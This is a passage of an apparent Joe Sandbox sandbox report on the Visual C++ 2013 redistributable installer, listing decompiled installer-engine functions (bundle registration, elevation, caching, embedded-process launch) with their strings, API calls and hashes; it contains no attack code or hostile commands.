0x00000000
0x01285cf0
0x01285cf6
0x01285cf8
0x01285cfb
0x01285cff
0x00000000
0x01285cff
0x01285cea
0x01285c8c
0x01285c95
0x01285c9e
0x01285ca0
0x01285ca2
0x01285e09
0x00000000
0x01285ca8
0x01285cae
0x01285cb0
0x01285cb3
0x01285cb7
0x01285d8f
0x01285d8f
0x01285d95
0x01285d98
0x00000000
0x00000000
0x01285d9e
0x01285d98
0x01285ca2
0x01285c8a
0x01285c68
0x00000000
0x01285c4d
0x01285df4
0x00000000
0x01285df4
0x01285c0a
0x01285c0a
0x00000000
0x01285c0a
0x01285bed
0x01285bed
0x01285e23
0x01285e23
0x01285e24
0x01285e2a
0x01285db6
0x01285db6
0x01285dbb
0x01285dc0
0x01285dc0
0x01285dc3
0x01285dc8
0x01285dcd
0x01285dcd
0x01285dd4
0x01285dd9
0x01285dd9
0x01285de2
0x01285de7
0x01285de7
0x01285df1

Strings

Upgrade, xrefs: 01285CC0
Failed to resize Upgrade code array in registration, xrefs: 01285E10
Detect, xrefs: 01285C78
Failed to get RelatedBundle nodes, xrefs: 01285BED
RelatedBundle, xrefs: 01285BCB
Patch, xrefs: 01285D4D
Failed to get RelatedBundle element count., xrefs: 01285C0A
Addon, xrefs: 01285D08
Failed to resize Addon code array in registration, xrefs: 01285E17
Failed to get @Action., xrefs: 01285DFB
Failed to resize Patch code array in registration, xrefs: 01285E1E
Invalid value for @Action: %ls, xrefs: 01285DA8
Failed to resize Detect code array in registration, xrefs: 01285E09
Action, xrefs: 01285C3C
Failed to get @Id., xrefs: 01285E02
Failed to get next RelatedBundle element., xrefs: 01285DF4

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID:
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade
API String ID: 0-3660206225
Opcode ID: 3f69829e16f066d0639032d510b139f972004086bff3919285d23050ec16f291
Instruction ID: 9b6fe0ff0045dae8837e3879d44b2f7408454d183f249573568d1f5a77dd2bb5
Opcode Fuzzy Hash: 3f69829e16f066d0639032d510b139f972004086bff3919285d23050ec16f291
Instruction Fuzzy Hash: 4C718F71A6170ABFD711EE94CCC5FFE7BB5FB48748F204558EA026B280D771AA028B10

Uniqueness

Uniqueness Score: -1.00%

Function 0128C33B Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 354
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0128C33B(void* __edx, struct _SECURITY_ATTRIBUTES* _a4, char _a8) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				char _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				signed int _v32;
				struct _SECURITY_ATTRIBUTES* _v36;
				char _v40;
				signed int* _v44;
				char* _v48;
				void _v52;
				void* __ebx;
				intOrPtr* _t110;
				intOrPtr* _t121;
				void* _t133;
				signed int _t147;
				signed int _t153;
				void* _t173;
				signed int _t177;
				signed int _t179;
				void _t181;

				_t173 = __edx;
				_t181 = _a4;
				_t2 = _t181 + 0x418; // 0xf0680d79
				_v32 =  *_t2;
				asm("stosd");
				asm("stosd");
				_push(0x2000012c);
				_push(2);
				_v40 = 0;
				_v16 = 0;
				_v24 = 0;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v12 = 0;
				_v20 = 0;
				_a4 = 0;
				asm("stosd");
				E01281566();
				_t15 = _t181 + 0xb8; // 0x12813bb
				if(E0128BB5E(_t15,  &_v40) >= 0) {
					_t16 = _t181 + 0x2b8; // 0x12815bb
					_t17 = _t181 + 0xb8; // 0x12813bb
					E012A11D5(__eflags, _t17, _t16);
					_t18 = _t181 + 0xc8; // 0xc0335756
					_t110 =  *_t18;
					_t164 =  *_t110;
					_t177 = E0128BC36(_t17, 1,  *((intOrPtr*)( *_t110 + 0x68))(_t110));
					__eflags = _t177;
					if(_t177 >= 0) {
						__eflags =  *((intOrPtr*)(_t181 + 0x30)) - 3;
						if( *((intOrPtr*)(_t181 + 0x30)) != 3) {
							_push( &_v16);
							_push(0);
							__eflags = E012A1206();
							if(__eflags >= 0) {
								E012A118E(_t114);
								 *((intOrPtr*)(_t181 + 0xf0)) = _a8;
								_t26 = _t181 + 0x88; // 0x128138b
								_t179 = E012A11A6(__eflags, _t26);
								__eflags = _t179;
								if(_t179 >= 0) {
									__eflags =  *(_t181 + 0x440);
									if( *(_t181 + 0x440) != 0) {
										L17:
										_t31 = _t181 + 0x490; // 0x1281793
										_t119 = _t31;
										__eflags =  *_t119;
										if( *_t119 != 0) {
											L20:
											__eflags =  *(_t181 + 0x40c);
											if( *(_t181 + 0x40c) == 0) {
												L26:
												__eflags =  *(_t181 + 0x410);
												if(__eflags == 0) {
													L30:
													__eflags =  *((intOrPtr*)(_t181 + 0x480)) - 3;
													if( *((intOrPtr*)(_t181 + 0x480)) != 3) {
														L35:
														__eflags =  *(_t181 + 0x450);
														if( *(_t181 + 0x450) == 0) {
															L47:
															__eflags =  *(_t181 + 0x460);
															if(__eflags != 0) {
																_t179 = E012A36FB(__eflags, _t181, _v8,  &_v24,  &_v32,  &_v12,  &_v20,  &_a4);
																_t71 = _t181 + 0xb8; // 0x12813bb
																_t119 = E0128B854(_t71, _t179);
															}
															__eflags = _v8;
															if(_v8 == 0) {
																L52:
																__eflags = _t179;
																if(_t179 >= 0) {
																	__eflags = _v12;
																	if(_v12 == 0) {
																		__eflags = _v20;
																		if(_v20 == 0) {
																			__eflags = _a4 - 2;
																			if(_a4 != 2) {
																				__eflags =  *(_t181 + 0x470);
																				if( *(_t181 + 0x470) != 0) {
																					_t78 = _t181 + 0x4a4; // 0x2ba8c468
																					_t79 = _t181 + 0x400; // 0x1281703
																					_t80 = _t181 + 0xb8; // 0x12813bb
																					_t119 = E012A1A08(_t80, _t79,  *_t78);
																				}
																			}
																		}
																	}
																}
																goto L58;
															} else {
																_t119 = E0128C1E0(_t164, _v8);
																__eflags = _t179;
																if(_t179 < 0) {
																	L58:
																	__eflags = _v28;
																	if(_v28 == 0) {
																		L68:
																		__eflags = _v36;
																		if(_v36 != 0) {
																			_t88 = _t181 + 0x4a4; // 0x2ba8c468
																			_t119 = E0128E280(_t164, _t173,  *_t88);
																		}
																		goto L70;
																	}
																	__eflags = _v32;
																	if(_v32 != 0) {
																		L62:
																		_t164 = 1;
																		__eflags = 1;
																		L63:
																		__eflags = _t179;
																		if(_t179 < 0) {
																			L66:
																			_t133 = 1;
																			__eflags = 1;
																			L67:
																			_t119 = E012A1943(_t173, _t181, _t133, _t164, _v20, _a4);
																			goto L68;
																		}
																		__eflags = _v12;
																		if(_v12 != 0) {
																			goto L66;
																		}
																		_t133 = 0;
																		goto L67;
																	}
																	__eflags =  *(_t181 + 0x41c);
																	if( *(_t181 + 0x41c) != 0) {
																		goto L62;
																	}
																	_t164 = 0;
																	goto L63;
																}
																_t179 = _t119;
																goto L52;
															}
														}
														_v48 =  &_v24;
														_v44 =  &_v12;
														_v52 = _t181;
														_t119 = CreateThread(0, 0, 0x128c157,  &_v52, 0, 0);
														_v8 = _t119;
														__eflags = _t119;
														if(_t119 != 0) {
															__eflags =  *((intOrPtr*)(_t181 + 0x3e0)) - 1;
															if( *((intOrPtr*)(_t181 + 0x3e0)) == 1) {
																goto L47;
															}
															_t179 = E0128C1E0(_t164, _t119);
															__eflags = _t179;
															if(_t179 >= 0) {
																_t119 = CloseHandle(_v8);
																_v8 = 0;
																goto L47;
															}
															_push("Failed while caching, aborting execution.");
															L45:
															_t119 = E012AFA86();
															_t164 = _t179;
															goto L58;
														}
														_t147 = GetLastError();
														__eflags = _t147;
														if(_t147 > 0) {
															_t147 = _t147 & 0x0000ffff | 0x80070000;
															__eflags = _t147;
														}
														_t179 = _t147;
														__eflags = _t179;
														if(_t179 >= 0) {
															_t179 = 0x80004005;
														}
														E012B294E(_t147, "core.cpp", 0x26a, _t179);
														_push("Failed to create cache thread.");
														goto L45;
													}
													_t49 = _t181 + 0x4bc; // 0xb886
													_t119 =  *_t49;
													__eflags = _t119 - 0xffffffff;
													if(_t119 == 0xffffffff) {
														goto L35;
													}
													_a8 = 0;
													_t179 = E01283382( &_a8, _t119, 0xf0000002,  &_a8, 4);
													__eflags = _t179;
													if(_t179 >= 0) {
														_push("Posted message to parent process to signal that the parent process can stop waiting");
														E012AF6A2();
														_t164 = 2;
														_t52 = _t181 + 0x4ac; // 0x12817af
														_t119 = E01282872(_t52);
														goto L35;
													}
													_push("Failed to send completion over the pipe.");
													goto L45;
												}
												_t179 = E012A17A0(0, _t164, _t173, __eflags, _t181);
												__eflags = _t179;
												if(_t179 >= 0) {
													_v28 = 1;
													goto L30;
												}
												_push("Failed to register bundle.");
												_t119 = E012AFA86();
												_t164 = _t179;
												goto L68;
											}
											_t37 = _t181 + 0xf0; // 0x15ff3975
											_t153 = E0128BCE8(0, _t173, _t181,  *_t37);
											__eflags = _t153;
											if(_t153 >= 0) {
												__eflags =  *(_t181 + 0x3dc);
												_t41 = _t181 + 0x484; // 0x15fff85d
												_t42 = _t181 + 0x88; // 0x128138b
												_t43 = _t181 + 0x400; // 0x48cb6ff
												_t44 = _t181 + 0x4a4; // 0x2ba8c468
												_t179 = E0128E1B5(_t173,  *(_t181 + 0x3dc),  *_t44, _t42,  *_t43,  *_t41, 0 |  *(_t181 + 0x3dc) == 0x00000000);
												__eflags = _t179;
												if(_t179 >= 0) {
													_v36 = 1;
													goto L26;
												}
												_push("Another per-machine setup is already executing.");
												goto L2;
											}
											_push("Failed to elevate.");
											goto L2;
										}
										_t179 = _t119;
										__eflags = _t179;
										if(_t179 >= 0) {
											goto L20;
										}
										_push("Failed to cache engine to working directory.");
										goto L2;
									}
									__eflags =  *(_t181 + 0x450);
									if( *(_t181 + 0x450) != 0) {
										goto L17;
									}
									__eflags =  *(_t181 + 0x460);
									if( *(_t181 + 0x460) != 0) {
										goto L17;
									}
									__eflags =  *(_t181 + 0x470);
									if( *(_t181 + 0x470) != 0) {
										goto L17;
									}
									_push(0xa000017c);
									_push(2);
									_t119 = E01281566();
									goto L3;
								} else {
									_push("Failed to set initial apply variables.");
									goto L2;
								}
							} else {
								_push("Another per-user setup is already executing.");
								goto L2;
							}
						} else {
							_t179 = 0x8007015e;
							_t21 = _t181 + 0xc8; // 0xc0335756
							_a4 = 1;
							_t119 = E0128B7CD(_t164, _t173,  *_t21, 5, 0, 0x8007015e, 0, 0x10, 0);
							goto L70;
						}
					} else {
						E012B294E(_t112, "core.cpp", 0x21c, _t177);
						_push("UX aborted apply begin.");
						goto L2;
					}
				} else {
					_push("Engine cannot start apply because it is busy with another action.");
					L2:
					_push(_t179);
					_t119 = E012AFA86();
					L3:
					L70:
					 *((intOrPtr*)(_t181 + 0xf0)) = 0;
					E012A119A(_t119);
					if(_v16 != 0) {
						ReleaseMutex(_v16);
						CloseHandle(_v16);
					}
					if(_v40 != 0) {
						_t94 = _t181 + 0xb8; // 0x12813bb
						E0128B82C(_t94);
					}
					if(_v8 != 0) {
						CloseHandle(_v8);
					}
					_push(_a4);
					_t98 = _t181 + 0xc8; // 0xc0335756
					_t121 =  *_t98;
					_push(_t179);
					_push(_t121);
					if( *((intOrPtr*)( *_t121 + 0xd0))() == 0x66) {
						 *(_t181 + 0x18) = 1;
					}
					_t101 = _t181 + 0x18; // 0xc30000c6
					_push(E01291879( *_t101));
					_push(E01291A24(_a4));
					E01281566(2, 0x2000018f, _t179);
					return _t179;
				}
			}

0x0128c33b
0x0128c343
0x0128c346
0x0128c34d
0x0128c357
0x0128c358
0x0128c359
0x0128c35e
0x0128c360
0x0128c363
0x0128c366
0x0128c369
0x0128c36c
0x0128c36f
0x0128c372
0x0128c375
0x0128c378
0x0128c37b
0x0128c37c
0x0128c386
0x0128c397
0x0128c3ab
0x0128c3b2
0x0128c3b9
0x0128c3be
0x0128c3be
0x0128c3c4
0x0128c3d3
0x0128c3d5
0x0128c3d7
0x0128c3f0
0x0128c3f4
0x0128c41d
0x0128c41e
0x0128c426
0x0128c428
0x0128c434
0x0128c43c
0x0128c442
0x0128c44e
0x0128c450
0x0128c452
0x0128c45e
0x0128c464
0x0128c48f
0x0128c48f
0x0128c48f
0x0128c495
0x0128c497
0x0128c4c6
0x0128c4c6
0x0128c4cc
0x0128c52b
0x0128c52b
0x0128c531
0x0128c558
0x0128c558
0x0128c55f
0x0128c5aa
0x0128c5aa
0x0128c5b0
0x0128c648
0x0128c648
0x0128c64e
0x0128c66d
0x0128c670
0x0128c677
0x0128c677
0x0128c67c
0x0128c67f
0x0128c68f
0x0128c68f
0x0128c691
0x0128c693
0x0128c696
0x0128c698
0x0128c69b
0x0128c69d
0x0128c6a1
0x0128c6a3
0x0128c6a9
0x0128c6ab
0x0128c6b1
0x0128c6b8
0x0128c6bf
0x0128c6bf
0x0128c6a9
0x0128c6a1
0x0128c69b
0x0128c696
0x00000000
0x0128c681
0x0128c684
0x0128c689
0x0128c68b
0x0128c6c4
0x0128c6c4
0x0128c6c7
0x0128c6fb
0x0128c6fb
0x0128c6fe
0x0128c700
0x0128c706
0x0128c706
0x00000000
0x0128c6fe
0x0128c6c9
0x0128c6cc
0x0128c6da
0x0128c6dc
0x0128c6dc
0x0128c6dd
0x0128c6dd
0x0128c6df
0x0128c6ea
0x0128c6ec
0x0128c6ec
0x0128c6ed
0x0128c6f6
0x00000000
0x0128c6f6
0x0128c6e1
0x0128c6e4
0x00000000
0x00000000
0x0128c6e6
0x00000000
0x0128c6e6
0x0128c6ce
0x0128c6d4
0x00000000
0x00000000
0x0128c6d6
0x00000000
0x0128c6d6
0x0128c68d
0x00000000
0x0128c68d
0x0128c67f
0x0128c5ba
0x0128c5c1
0x0128c5cf
0x0128c5d2
0x0128c5d8
0x0128c5db
0x0128c5dd
0x0128c615
0x0128c61c
0x00000000
0x00000000
0x0128c624
0x0128c626
0x0128c628
0x0128c63f
0x0128c645
0x00000000
0x0128c645
0x0128c62a
0x0128c62f
0x0128c630
0x0128c636
0x00000000
0x0128c636
0x0128c5df
0x0128c5e5
0x0128c5e7
0x0128c5ee
0x0128c5ee
0x0128c5ee
0x0128c5f3
0x0128c5f5
0x0128c5f7
0x0128c5f9
0x0128c5f9
0x0128c609
0x0128c60e
0x00000000
0x0128c60e
0x0128c561
0x0128c561
0x0128c567
0x0128c56a
0x00000000
0x00000000
0x0128c578
0x0128c580
0x0128c582
0x0128c584
0x0128c590
0x0128c597
0x0128c59d
0x0128c59e
0x0128c5a5
0x00000000
0x0128c5a5
0x0128c586
0x00000000
0x0128c586
0x0128c539
0x0128c53b
0x0128c53d
0x0128c551
0x00000000
0x0128c551
0x0128c53f
0x0128c545
0x0128c54b
0x00000000
0x0128c54b
0x0128c4ce
0x0128c4d5
0x0128c4dc
0x0128c4de
0x0128c4ec
0x0128c4f6
0x0128c4fc
0x0128c502
0x0128c509
0x0128c514
0x0128c516
0x0128c518
0x0128c524
0x00000000
0x0128c524
0x0128c51a
0x00000000
0x0128c51a
0x0128c4e0
0x00000000
0x0128c4e0
0x0128c4b6
0x0128c4b8
0x0128c4ba
0x00000000
0x00000000
0x0128c4bc
0x00000000
0x0128c4bc
0x0128c466
0x0128c46c
0x00000000
0x00000000
0x0128c46e
0x0128c474
0x00000000
0x00000000
0x0128c476
0x0128c47c
0x00000000
0x00000000
0x0128c47e
0x0128c483
0x0128c485
0x00000000
0x0128c454
0x0128c454
0x00000000
0x0128c454
0x0128c42a
0x0128c42a
0x00000000
0x0128c42a
0x0128c3f6
0x0128c3fa
0x0128c403
0x0128c409
0x0128c410
0x00000000
0x0128c410
0x0128c3d9
0x0128c3e4
0x0128c3e9
0x00000000
0x0128c3e9
0x0128c399
0x0128c399
0x0128c39e
0x0128c39e
0x0128c39f
0x0128c3a4
0x0128c70b
0x0128c70b
0x0128c711
0x0128c719
0x0128c71e
0x0128c727
0x0128c727
0x0128c730
0x0128c732
0x0128c739
0x0128c739
0x0128c741
0x0128c746
0x0128c746
0x0128c74c
0x0128c74f
0x0128c74f
0x0128c757
0x0128c758
0x0128c762
0x0128c764
0x0128c764
0x0128c76b
0x0128c773
0x0128c77c
0x0128c785
0x0128c793
0x0128c793

APIs

Part of subcall function 0128BB5E: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,0128D9E6,?,00000000,75BDA770,?,00000000), ref: 0128BB6D
Part of subcall function 0128BB5E: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0128BB7A
Part of subcall function 0128BB5E: LeaveCriticalSection.KERNEL32(?,?,0128D9E6,?,00000000,75BDA770,?,00000000), ref: 0128BB8F

ReleaseMutex.KERNEL32(?,0128138B,00000000,?,012813BB,00000001,00000000), ref: 0128C71E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01281303,?,?,0128180F), ref: 0128C727
CloseHandle.KERNEL32(?,0128138B,00000000,?,012813BB,00000001,00000000), ref: 0128C746

Part of subcall function 012A118E: SetThreadExecutionState.KERNEL32 ref: 012A1193

Strings

Failed to set initial apply variables., xrefs: 0128C454
core.cpp, xrefs: 0128C3DF, 0128C604
UX aborted apply begin., xrefs: 0128C3E9
Failed to register bundle., xrefs: 0128C53F
Failed to elevate., xrefs: 0128C4E0
Another per-machine setup is already executing., xrefs: 0128C51A
Another per-user setup is already executing., xrefs: 0128C42A
Failed to cache engine to working directory., xrefs: 0128C4BC
Failed to create cache thread., xrefs: 0128C60E
Failed to send completion over the pipe., xrefs: 0128C586
Engine cannot start apply because it is busy with another action., xrefs: 0128C399
Failed while caching, aborting execution., xrefs: 0128C62A
Posted message to parent process to signal that the parent process can stop waiting, xrefs: 0128C590

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCriticalHandleSection$CompareEnterExchangeExecutionInterlockedLeaveMutexReleaseStateThread
String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to send completion over the pipe.$Failed to set initial apply variables.$Failed while caching, aborting execution.$Posted message to parent process to signal that the parent process can stop waiting$UX aborted apply begin.$core.cpp
API String ID: 1740103319-3198874528
Opcode ID: c1811e16f6eb347e081839016166ae97aa7cc98679e7f83efa3a0b27b081153c
Instruction ID: df2518e8f640ddc91c9ccbe799d6eb1c9fc093911c7c83fc61c2dc437eb4d9c1
Opcode Fuzzy Hash: c1811e16f6eb347e081839016166ae97aa7cc98679e7f83efa3a0b27b081153c
Instruction Fuzzy Hash: 55C1A5B2821606EFDF21BFA4C8859FE77B9EB54304F10453EE316A2081DB716665CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012A527D Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E012A527D(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _PROCESS_INFORMATION _v28;
				intOrPtr _v36;
				void* _v40;
				long _v44;
				char _v48;
				void _v52;
				intOrPtr _v56;
				char _v60;
				long _v64;
				char _v72;
				struct _STARTUPINFOW _v140;
				void* __esi;
				signed int _t96;
				signed int _t102;
				signed int _t103;
				void* _t107;
				char* _t113;

				_t107 = __edx;
				_v64 = GetCurrentProcessId();
				_v8 = 0;
				_v12 = 0;
				E012A7E30( &_v140, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t103 = 6;
				memset( &_v52, 0, _t103 << 2);
				E01282855( &_v52);
				asm("stosd");
				asm("stosd");
				_v60 = _a16;
				_v56 = _a20;
				_t113 = L"burn.embedded.async";
				if(_a12 == 0) {
					_t113 = L"burn.embedded";
				}
				if(E012828DB(_t107,  &_v52,  &_v48) >= 0) {
					if(E012835A5(0,  &_v52, 0,  &_v8) >= 0) {
						_push(_v64);
						_push(_v48);
						_push(_v52);
						_push(_t113);
						if(E012B177A( &_v12, L"%ls -%ls %ls %ls %u", _a8) >= 0) {
							if(CreateProcessW(_a4, _v12, 0, 0, 0, 0x8000000, 0, 0,  &_v140,  &_v28) != 0) {
								_v44 = GetProcessId(_v28.hProcess);
								_v40 = _v28.hProcess;
								_v28.hProcess = 0;
								_t102 = E01282BBB( &_v52);
								if(_t102 >= 0) {
									_t102 = E012833B1(0, _t107, _v36, 0x12a51e1,  &_v60,  &_v72);
									if(_t102 >= 0) {
										if(_a24 != 0 && _a12 == 0) {
											_t102 = E012B0034(0, _v40, 0xffffffff, _a24);
											if(_t102 < 0) {
												_push(_a4);
												_push("Failed to wait for embedded executable: %ls");
												goto L23;
											}
										}
									} else {
										_push("Failed to process messages from embedded message.");
										goto L18;
									}
								} else {
									_push("Failed to wait for embedded process to connect to pipe.");
									goto L18;
								}
							} else {
								_t96 = GetLastError();
								if(_t96 > 0) {
									_t96 = _t96 & 0x0000ffff | 0x80070000;
								}
								_t102 = _t96;
								if(_t102 >= 0) {
									_t102 = 0x80004005;
								}
								E012B294E(_t96, "embedded.cpp", 0x82, _t102);
								_push(_a4);
								_push("Failed to create embedded process atpath: %ls");
								L23:
								_push(_t102);
								E012AFA86();
							}
						} else {
							_push("Failed to allocate embedded command.");
							goto L18;
						}
					} else {
						_push("Failed to create embedded pipe.");
						goto L18;
					}
				} else {
					_push("Failed to create embedded pipe name and client token.");
					L18:
					_push(_t102);
					E012AFA86();
				}
				if(_v28.hThread != 0) {
					CloseHandle(_v28.hThread);
					_v28.hThread = 0;
				}
				if(_v28.hProcess != 0) {
					CloseHandle(_v28.hProcess);
					_v28 = 0;
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = 0;
				}
				E01282872( &_v52);
				return _t102;
			}

0x012a527d
0x012a5293
0x012a529e
0x012a52a1
0x012a52a4
0x012a52ae
0x012a52af
0x012a52b0
0x012a52b1
0x012a52ba
0x012a52bb
0x012a52be
0x012a52c4
0x012a52ca
0x012a52d4
0x012a52d5
0x012a52d9
0x012a52df
0x012a52e2
0x012a52ea
0x012a52ec
0x012a52ec
0x012a5302
0x012a5320
0x012a532c
0x012a5332
0x012a5335
0x012a5338
0x012a534e
0x012a537d
0x012a53c1
0x012a53c7
0x012a53ce
0x012a53d6
0x012a53da
0x012a53f8
0x012a53fc
0x012a5410
0x012a5424
0x012a5428
0x012a542a
0x012a542d
0x00000000
0x012a542d
0x012a5428
0x012a53fe
0x012a53fe
0x00000000
0x012a53fe
0x012a53dc
0x012a53dc
0x00000000
0x012a53dc
0x012a537f
0x012a537f
0x012a5387
0x012a538e
0x012a538e
0x012a5393
0x012a5397
0x012a5399
0x012a5399
0x012a53a9
0x012a53ae
0x012a53b1
0x012a5432
0x012a5432
0x012a5433
0x012a5438
0x012a5350
0x012a5350
0x00000000
0x012a5350
0x012a5322
0x012a5322
0x00000000
0x012a5322
0x012a5304
0x012a5304
0x012a5403
0x012a5403
0x012a5404
0x012a540a
0x012a5444
0x012a5449
0x012a544b
0x012a544b
0x012a5451
0x012a5456
0x012a5458
0x012a5458
0x012a545e
0x012a5463
0x012a5463
0x012a546b
0x012a5470
0x012a5472
0x012a5472
0x012a5479
0x012a5484

APIs

GetCurrentProcessId.KERNEL32(00000000,012A387B,00000000), ref: 012A5289
_memset.LIBCMT ref: 012A52A4
CloseHandle.KERNEL32(0129A697,00000000,012A51E1,012A54D4,?,?,?,?,00000000,?,?,00000001,?), ref: 012A5449
CloseHandle.KERNEL32(?,00000000,012A51E1,012A54D4,?,?,?,?,00000000,?,?,00000001,?), ref: 012A5456
CloseHandle.KERNEL32(?,00000000,012A51E1,012A54D4,?,?,?,?,00000000,?,?,00000001,?), ref: 012A5470

Part of subcall function 012835A5: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 012835D2
Part of subcall function 012835A5: GetLastError.KERNEL32(00000000,012817A1,0128BD3C,0128130D,?), ref: 012835DB
Part of subcall function 012835A5: LocalFree.KERNEL32(?,0128130D), ref: 0128373E

Strings

burn.embedded.async, xrefs: 012A52E2, 012A5338
burn.embedded, xrefs: 012A52EC
Failed to create embedded process atpath: %ls, xrefs: 012A53B1
Failed to process messages from embedded message., xrefs: 012A53FE
Failed to wait for embedded process to connect to pipe., xrefs: 012A53DC
Failed to allocate embedded command., xrefs: 012A5350
Failed to create embedded pipe name and client token., xrefs: 012A5304
Failed to wait for embedded executable: %ls, xrefs: 012A542D
Failed to create embedded pipe., xrefs: 012A5322
embedded.cpp, xrefs: 012A53A4
%ls -%ls %ls %ls %u, xrefs: 012A533C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$DescriptorSecurity$ConvertCurrentErrorFreeLastLocalProcessString_memset
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process atpath: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$burn.embedded.async$embedded.cpp
API String ID: 1195026954-3691304899
Opcode ID: c219e8028fb44aa269a6b6eb8df1e35621795083d1d1d740a941428fb9e4616f
Instruction ID: 340f4e04240ce7ac6b37ab60e843bc5083a7081702a2dca8a1361278f90a0393
Opcode Fuzzy Hash: c219e8028fb44aa269a6b6eb8df1e35621795083d1d1d740a941428fb9e4616f
Instruction Fuzzy Hash: AD517E72A2021AFBCF12AFE4DC819EFBBB9EF18B11F504526F601B2110D6B55A45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01297AAE Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 206
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01297AAE(WCHAR* __ecx, union _LARGE_INTEGER __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t39;
				signed int _t40;
				signed int _t59;
				signed int _t62;
				signed int _t65;
				signed int _t70;
				union _LARGE_INTEGER _t84;
				signed int _t85;

				_t80 = __edx;
				_t75 = __ecx;
				_t34 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t34 ^ _t85;
				_v36 = _a4;
				_v32 = _a8;
				asm("stosd");
				asm("stosd");
				_v28 = __ecx;
				_t84 = __edx;
				asm("stosd");
				_t39 = CreateFileW(__ecx, 0x40000000, 5, 0, 2, 0x8000080, 0);
				_v24 = _t39;
				if(_t39 != 0xffffffff) {
					_t40 = E012B5640(_v36, 0, 0, 0, 0);
					_t82 = _t40;
					if(_t40 >= 0) {
						_t82 = E012B57EB(_v36, _v24,  *((intOrPtr*)(_t84 + 8)), 0, 0);
						if(_t82 >= 0) {
							if( *((intOrPtr*)(_t84 + 0x28)) != 0) {
								_push(0);
								if(SetFilePointerEx(_v24,  *(_t84 + 0x18), 0, 0) != 0) {
									_t20 = _t84 + 0x24; // 0x75bda794
									if(E012B5783(_t75, _v24, _t20, 4) >= 0) {
										_push(0);
										if(SetFilePointerEx(_v24,  *(_t84 + 0x1c), 0, 0) != 0) {
											_t24 = _t84 + 0x28; // 0x75bda798
											_t82 = E012B5783(_t75, _v24, _t24, 4);
											if(_t82 < 0) {
												goto L18;
											} else {
